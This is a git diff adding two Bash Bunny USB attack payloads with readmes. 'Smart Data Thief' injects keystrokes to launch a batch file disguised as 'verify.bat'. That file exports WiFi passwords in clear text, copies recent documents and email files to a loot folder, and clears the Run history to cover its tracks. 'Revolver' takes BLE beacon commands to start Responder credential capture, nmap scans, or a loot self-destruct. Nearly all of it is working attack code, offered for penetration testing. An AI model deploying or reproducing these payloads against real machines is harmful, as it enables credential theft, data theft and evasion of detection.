diff --git a/payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt new file mode 100644 index 00000000..d9824648 --- /dev/null +++ b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt @@ -0,0 +1,109 @@ +# Title: Smart Data Thief +# Description: Exfiltrates high value files from documents / desktop, gets all WiFi keys, shuts down after configurable +# time, may be triggered to start and / or stop by BLE, offers optional distraction on shutdown +# Author: saintcrossbow +# Props: Hak5Darren +# Version: 1.0 +# Category: Exfiltration +# Target: Windows 10 with minimum powershell usage +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# The perfect versatile data thief with multiple configurations to tailor attacks towards an engagement. Attack is timed +# so you'll know exactly how much time you have with each target. See the configuraton section for modifications. +# +# Payload targets the following from the workstation: +# - All WiFi creds +# - The past 30 days in both Desktop and Documents +# - All Word docs, Excel spreadsheets, loose email files (*.msg), text files, and OneNote notebooks +# +# * Note: All bluetooth monitoring based on Hak5Darren's methods already present on the Bash Bunny + +# Files +# ----- +# - payload.txt: Starts and monitors the attack. All configuration contained in this file. +# - verify.bat: Run the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't +# verify anything – it is just called that because it is "in disguise" + +# Setup +# ----- +# - Place the payload.txt and verify.bat on either switch directory +# - If you are using a SD card, copy verify.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bash Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Slow 1 second yellow on and off: Waiting for start mission trigger by BLE +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" +# Total time allocated for the attack, after which the Bash Bunny will shutdown +EJECT_TIME=30 +# BLE ID to stop attack immediately and go to shutdown +ABORT_MISSION="QSTOP" +# Flash a bunch of windows and lock PC if ABORT mission received +DISTRACT_ON_ABORT=false +# Do we wait for a start trigger? And what is it? +WAIT_FOR_TRIGGER=false +START_MISSION="QSTART" + +# Setup +# ----- +LED SETUP + +# Start bluetooth for observation +source bunny_helpers.sh +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +sleep 1 +echo -n -e "AT+ROLE=2" > /dev/ttyS1 +echo -n -e "AT+RESET" > /dev/ttyS1 + +# Wait for "button job" if desired +if $WAIT_FOR_TRIGGER; then + CUCUMBER ENABLE + LED Y SLOW + WAIT_FOR_PRESENT $START_MISSION +fi + +# Attack +# ------ +CUCUMBER DISABLE +ATTACKMODE HID STORAGE +Q DELAY 1000 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 + +Q STRING cmd.exe /c start /min powershell ".((gwmi win32_volume -f 'label=''$BB_NAME''').Name+'payloads\\$SWITCH_POSITION\verify.bat')" +Q ENTER + +# Variation on the WAIT_FOR_PRESENT method so we can delay as well as observe BLE +for (( c=1; c<=$EJECT_TIME; c++ )) +do + timeout 1s cat /dev/ttyS1 > /tmp/bt_observation + if grep -ao $ABORT_MISSION /tmp/bt_observation; then + if $DISTRACT_ON_ABORT; then + for i in {1..5} + do + Q GUI d + Q DELAY 200 + done + Q GUI l + fi + break + fi +done + +sync +LED FINISH +Q DELAY 1500 +shutdown now + diff --git a/payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md new file mode 100644 index 00000000..915a83f4 --- /dev/null +++ b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md @@ -0,0 +1,54 @@ +## Smart Data Thief + +Make your Bash Bunny into the perfect data thief. This payload is ideal for demonstrating the need to lock workstations: using it, you can stroll through a facility and steal critical information from PC after PC. The attack is highly configurable with the following options: + + - Copies are timed to be as fast or as long as you want. You’ll know + exactly how long you have per workstation, and also know you can + remove the Bash Bunny safely once it the time expires + - The copy may be configured to stop when a secret BLE beacon is sent – + the Bash Bunny will shut down for immediate removal. + - Concerned that someone might see the attack? Configure the payload to + flash windows and suddenly lock before shutting down the Bash Bunny, + which gives the payload time to clean up its tracks while you make + appropriate excuses. + - Want to trigger the payload from afar? Make the attack a “button job” + – the Bash Bunny will take advantage of Cool Cucumber CPU usage while + waiting for the secret BLE beacon. + +The payload may be used with or without a SD card and places loot in a folder with the computer’s name. Additionally it targets the most likely high-value targets on a workstation, and only those that have been updated in past 30 days – however feel free to tailor parameters to your unique pentest situation. + +**Targets** + + 1. All WiFi creds used by the workstation + 2. The past 30 days in both Desktop and Documents for: +- Word docs +- Excel spreadsheets +- Loose email files (*.msg) +- Text files +- OneNote notebooks + +**Files Used** + +- payload.txt: Starts and monitors the attack. All configuration constants are contained in this file. +- verify.bat: Runs the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't verify anything – it is just called that because it is "in disguise" + +**Setup** +1. Place the payload.txt and verify.bat on either switch directory +2. If you are using a SD card, copy verify.bat to /payloads/switch*n*/ (where *n* is the switch you are running) +3. For maximum versatility, place verify.bat in both locations + +**Payload Configuration** + +Change any of the constants below to match your mission parameters: +- BB_NAME: Make sure you have the right Bash Bunny name in this constant +- EJECT_TIME: Total time allocated for the attack, after which the Bash Bunny will shutdown +- ABORT_MISSION: Specify what BLE beacon will stop the attack - the payload will check every second for the beacon +- DISTRACT_ON_ABORT: If the payload is stopped by the BLE beacon, it will also flash a bunch of windows and lock the PC before shutting down to cause a distraction. +- WAIT_FOR_TRIGGER: Don’t start the attack immediately but wait for the BLE beacon. +- START_MISSION: The BLE beacon that will remotely start the attack. Make sure WAIT_FOR_TRIGGER is set to true. + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Slow 1 second yellow on and off: Waiting for start mission trigger to be sent by BLE +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed \ No newline at end of file diff --git a/payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat new file mode 100644 index 00000000..a6c9c496 --- /dev/null +++ b/payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat @@ -0,0 +1,14 @@ +@echo off +cd /d %~dp0 +mkdir \loot\WiFiCreds\%COMPUTERNAME% +cd \loot\WiFiCreds\%COMPUTERNAME% +netsh wlan export profile key=clear +timeout 1 +mkdir \loot\DriveLast30\%COMPUTERNAME% +cd \loot\DriveLast30\%COMPUTERNAME% +robocopy %userprofile%\Documents\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl +robocopy %userprofile%\Desktop\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl + +REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f +timeout 1 +exit \ No newline at end of file diff --git a/payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt b/payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt new file mode 100644 index 00000000..93770036 --- /dev/null +++ b/payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt @@ -0,0 +1,261 @@ +# Title: Revolver +# Description: Multiple network attacks and modes based on BLE beacons +# Author: saintcrossbow +# Props: Hak5Darren (BLE, QuickCreds, nmap) +# Version: 1.0 +# Category: General +# Target: Windows 10 with minimum powershell usage +# Attackmodes: All + +# Full Description +# ---------------- +# This payload was made in the style of Q Branch: those that use this need to know they have +# multiple options for attack as well as getting out of a bad situation. Switching into this +# payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start +# attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The +# payload is easily extendable to include any attack you might need in the field. +# +# Note other payloads were co-opted into this multimode attack, and to make it easy I used +# Hak5Darren's code, partially because I imagine he wants to see these payloads extended, +# and also because I know he appreciates Q Branch. + +# Configuring +# ----------- +# Change the BLE beacon commands listed in Options below to something unique to you. Definitely +# do not want someone else activating your Bash Bunny. Also verify the responder and nmap +# options are to your liking. + +# Usage +# ----- +# Plug in to get into command waiting mode (slow white LED). Launch attacks by sending the +# right BLE beacon. Make sure to stop the beacon after the attack so you won't go into a loop. + +# LEDs +# ---- +# Slow white LED: Awaiting BLE commands +# Yellow: Attack in progress +# Red: Self destruct of loot +# Blue solid: USB mode +# Cyan solid: Ethernet mode + +# Options +# ------- +REQUIRETOOL responder + +# BLE beacon options - change to your preferences. Make sure to use things +# you'll not encounter since you don't want to start a self-destruct sequence +# on accident +ABORT_MISSION="QSTOP" +START_QUICKCREDS_WIN="QCREDS" +START_QUICKCREDS_NIX="QCREDNIX" +START_NMAP="QNMAP" +START_USB="QLOOT" +START_ETHER="QETHER" +START_DEL_LOOT="QSELFD" + +# Responder options +RESPONDER_OPTIONS="-w -r -d P" +RESPONDER_LOOTDIR=/root/udisk/loot/quickcreds +# Nmap options +NMAP_OPTIONS = "-sS -O -sV -F -oA" +NMAP_LOOTDIR=/root/udisk/loot/nmap + +# Setup +# ----- +LED SETUP + + +# Responder +# --------- +# Note: This is a modified version of quick creds +# Original by Hak5Darren +# --------- +startResponder() +{ + CUCUMBER DISABLE + # Set convenience variables + GET TARGET_HOSTNAME + GET TARGET_IP + + # Setup named logs in loot directory + mkdir -p $RESPONDER_LOOTDIR + HOST=${TARGET_HOSTNAME} + # If hostname is blank set it to "noname" + [[ -z "$HOST" ]] && HOST="noname" + COUNT=$(ls -lad $RESPONDER_LOOTDIR/$HOST* | wc -l) + COUNT=$((COUNT+1)) + mkdir -p $RESPONDER_LOOTDIR/$HOST-$COUNT + + # As a backup also copy logs to a loot directory in /root/loot/ + mkdir -p /root/loot/quickcreds/$HOST-$COUNT + + # Check target IP address. If unset, blink RED and end. + if [ -z "${TARGET_IP}" ]; then + LED FAIL2 + exit 1 + fi + + # Set LED yellow, run attack + LED ATTACK + cd /tools/responder + + # Clean logs directory + rm logs/* + + # Run Responder with specified options + python Responder.py -I usb0 $RESPONDER_OPTIONS & + + # Wait until NTLM log is found + until [ -f logs/*NTLM* ] + do + # Ima just loop here until NTLM logs are found + sleep 1 + done + + # copy logs to loot directory + cp logs/* /root/loot/quickcreds/$HOST-$COUNT + cp logs/* $RESPONDER_LOOTDIR/$HOST-$COUNT + + # Sync USB disk filesystem + sync + LED FINISH + Q DELAY 1500 + + # Return to waiting mode + CUCUMBER ENABLE + LED W SLOW +} + +# Nmap +# ---- +# Note: This is a modified version of one of the very first payloads, nmap +# Original by Hak5Darren +# ---- +startNmap() +{ + CUCUMBER DISABLE + ATTACKMODE RNDIS_ETHERNET + + GET TARGET_HOSTNAME + GET TARGET_IP + + # Setup named logs in loot directory + mkdir -p $NMAP_LOOTDIR + HOST=${TARGET_HOSTNAME} + # If hostname is blank set it to "noname" + [[ -z "$HOST" ]] && HOST="noname" + COUNT=$(ls -lad $NMAP_LOOTDIR/$HOST*.log | wc -l) + COUNT=$((COUNT+1)) + + if [ -z ""${TARGET_IP} ]; then + LED FAIL + Q DELAY 1500 + else + LED ATTACK + nmap $NMAP_OPTIONS $TARGET_IP >> $NMAP_LOOTDIR/$HOST-$COUNT.log + sync + LED FINISH + Q DELAY 1500 + fi + + # Return to waiting mode + CUCUMBER ENABLE + LED W SLOW +} + +startLoot() +{ + CUCUMBER DISABLE + # We are going for solid LED this time in case the device needs to be played off as normal USB + # ... and best of luck to you on that! + LED B SOLID + ATTACKMODE STORAGE +} + +# For sharing, getting on via putty, or exiting USB mode +startEthernet() +{ + CUCUMBER DISABLE + LED C SOLID + ATTACKMODE RNDIS_ETHERNET +} + + +# Delete everything in loot directory +# Depending on your engagement, could also delete switch and library - but be careful! +# Switches to HID to ensure it is not in USB mode or possibly timing out in Ethernet. Going plaid +# to delete those files +startSelfDestruct() +{ + ATTACKMODE HID + CUCUMBER PLAID + LED R SOLID + rm -r /root/udisk/loot + rm -r /root/loot/ + sync + shutdown now +} + +# Main +# ---- +# Start bluetooth for observation +source bunny_helpers.sh +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +sleep 1 +echo -n -e "AT+ROLE=2" > /dev/ttyS1 +echo -n -e "AT+RESET" > /dev/ttyS1 + +# Wait for BLE +CUCUMBER ENABLE +LED W SLOW + +while : +do + timeout 1s cat /dev/ttyS1 > /tmp/bt_observation + + # Shutdown + if grep -ao $ABORT_MISSION /tmp/bt_observation; then + sync + LED FINISH + Q DELAY 1500 + shutdown now + fi + + # Responder - Windows + if grep -ao $START_QUICKCREDS_WIN /tmp/bt_observation; then + ATTACKMODE RNDIS_ETHERNET + startResponder + fi + + # Responder - *nix or mac + if grep -ao $START_QUICKCREDS_NIX /tmp/bt_observation; then + ATTACKMODE ECM_ETHERNET + startResponder + fi + + # Start nmap against host + if grep -ao $START_NMAP /tmp/bt_observation; then + startNmap + fi + + # Open as USB device + if grep -ao $START_USB /tmp/bt_observation; then + startLoot + fi + + # Open as Ethernet device + if grep -ao $START_ETHER /tmp/bt_observation; then + startEthernet + fi + + # Limited self-destruct of loot + if grep -ao $START_DEL_LOOT /tmp/bt_observation; then + startSelfDestruct + # Leave the scene after the delete + break + fi + +done + +sync diff --git a/payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md b/payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md new file mode 100644 index 00000000..31846015 --- /dev/null +++ b/payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md @@ -0,0 +1,25 @@ +## Revolver + + +This payload was made in the style of Q Branch: it provides multiple options for attack and getting out of bad situations. Switching into this payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The payload is easily extendable to include any attack you might need in the field. + +Note other payloads were co-opted into this multimode attack, and to make it easy +I used Hak5Darren's code, partially because I imagine he wants to see these payloads +extended, and also because I know he appreciates Q Branch. + +**Features** + - Once active, the Bash Bunny blinks a white LED indicating it is waiting for BLE beacons + - Commands may be issued to start classic payloads (nmap, quickcreds), switch modes (USB storage or Ethernet), shutdown for removal, or initiate a loot self-destruct + - After attacks are complete, Bash Bunny returns to a waiting state for more commands (except for self destruct and shut down) + +**Payload Configuration** +1. Change the BLE beacons in the *Options* section. Don't leave in defaults - you don't want someone else to control your Bash Bunny! +2. Verify the responder and nmap options are to your liking + +**LED meanings** +- Slow 1 second white on and off: Awaiting commands +- Single yellow blink: Attack in progress +- Green rapid flash, then solid: Attack complete +- Solid red: Loot self-destruct - complete and ready to remove when off +- Solid blue: USB mode +- Solid cyan: Ethernet mode